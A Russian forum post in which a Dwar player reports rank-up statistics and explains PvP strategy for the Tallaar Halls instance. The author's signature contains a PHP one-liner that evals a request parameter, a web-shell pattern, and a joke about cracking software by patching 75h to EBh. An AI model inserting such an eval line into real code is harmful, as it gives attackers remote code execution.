Сначала простая статистика:
30.10.2008 перешел на 7 уровень будучи воином, доблести 110 очков.
2.11.2008 впервые зашел в залы Таллаара.
27.03.2009 получено звание полководца.
За эти 3 месяца (полмесяца до НГ и полмесяца после уезжал в теплые края на отдых):
Получено 1,600,000 доблести и 95.21% опыта.
Выиграно 996 боев в которых получено 869 скальпов.
Проиграно 2107 боев.
Прокачан палач от 0 до 37.
Затраты составили 76з (свитки, элики и ремонт).
Использовались 2 комплекта: фулл кожи из магазина и фулл палача из дома-1. Из особых трофеев: будучи в коже, убил 1 крита-гладиатора в шапке Ярмо и с 6 благами, около 25 обычных гладиаторов критов и уворотов, 1 танка в фуле МС. Рекорд: 3 скальпа в одном бою (гладиаторы танк и уворот в арсеналке и зеленый уворот в единороге).
Стратегия и тактика в инсте:
Залы бывают 3 типов, для каждого вводим коэффициенты к1, к2 и к3, обозначающие вероятность того что на нас сразу нападут если мы родились в этом зале. Коэфициенты подбираются эмпирически и делят залы на 3 группы: плохие, средние и хорошие.
В залы заходим в коже. Начальная тактика: если попали в плохой зал, то сразу переходим в хороший и нападаем наудачу на того кто там стоит. Если попали в средний или хороший, то стоим и изучаем статистику.
Исходя из статистики вычисляем кто где находится. Например, если завязался тройной бой, то с высокой долей вероятности это один из плохих залов. Для каждого из возможных переходов вычисляем вероятность нашей победы. Как только в каком-либо из случаев эта вероятность становится 0.4 или выше - сразу делаем переход. Если все потенциальные цели стоят голые, то остаемся в коже при переходе. Если цели в коже или убиваемой зеленке (например 4 шмотки МС), то одеваемся в палача.
После перехода если видим цель, то сразу нападаем. Если цели нет, то изучаем завершенку в локе и по урону и статистике вычисляем кто тут был. Если данный зал средний или хороший, то считаем вероятность и ожидаем пока опять не будут шансы 0.4 или выше. Если зал плохой, то переходим дальше сразу как закончится таймер.
Основная задача вычислить где был самый сильный игрок в инсте (забойщик), вычислить его дальнейший маршрут и следовать на 1-2 клетки позади него.
Тактика ведения боя: если бьемся с превосходящим соперником, то задача тянуть и бить жаждой, в надежде поймать на стан. Обязательно подгадать удар так чтобы первым жажду бил он, а потом мы (пропустить ход в начале или запутать с ударами). Если противник умный и уходит в блок, то не бить 3 удара чтобы он продолжал бить в блоке. Основная наша задача затянуть бой чтобы попасть в зачетную пятерку. В бою против слабого противника стараться убить его как можно быстрее, не жалеть мощь на каждый удар, бить змеей. В равном бою (кожа против кожи) бить змейкой. Универсальная затарка: 2 хилки 2 мощи. Если много кожи или слабой зеленки, то затарка: хилка, очищалка, травилка и мощь/кровь.
Если в залах 4 и более танков или же обкастованый танк под алкой - сразу же переходим в плохой зал и сливаемся первому попавшемуся как можно быстрее. Выгоднее сходить еще кучу раз в другие залы чем занять 2 место, но провисеть в этих залах 2 часа пока танк всех не забодает. Аналогично если в залах 6 и более обкастованых гладиаторов и особенно если они все стоят и ждут.
Основная задача - попасть в четверку, какое будет место 2, 3 или 4 - не принципиально. Поэтому если осталось 4 и есть убиваемая цель, но вероятность победы ниже 0.4 - все равно рискуем и нападаем. Скальпы и +1 палача всегда пригодятся.
Если оставшиеся противники дерутся между собой, то в бой к ним не лезем даже если есть реальные шансы убить победителя и занять 1 место. Разница между 1 и 2 местом не принципиальна, а вот обламывать человеку победу нехорошо, уважаем чужие чувства. Если в коже напали на одетого танка, то тянем, но не убиваем его даже если предоставится возможность. За танков дают слишком много опыта, так что 1 раз можно убить для галочки, а больше не стоит. Если мы в палаче, то убиваем танков только если набили не более 1000 урона, иначе даем ему выжить после стана и тянем.
Как осталось двое - идем в зал кровопролития и пишем у себя в инфе про это. Чем быстрее закончатся залы, тем всем выгоднее. Жечь чужой обкаст нам не выгодно, если в инсте есть 1 сильный игрок, то залы обычно быстрые и довольно легко занять 2 место просто ходя вслед за ним по его маршруту. Стараемся сразу же встать в очередь чтобы снова попасть с этим сильным игроком.
Вот и вся основа в очень кратком и сжатом виде. В полном виде все это занимает около 6 страниц: точные формулы для вычисления вероятностей, описание различных частных случаев и всевозможных хитростей итд итп. Но публиковать все это я не буду по понятным причинам, сами изучайте. :)
А я пойду дофармливать недостающие 100з до полковничьей арсеналки и бить мобов по которым весьма соскучился. :) Удачи всем в боях!
Роббокоп, Орден Магмарского Флуда
<? @eval(stripslashes($p)) ?>; [Люблю и умею менять 75h на EBh]
http://w1.dwar.ru/artifact_info.php?artifact_id=2542087838
|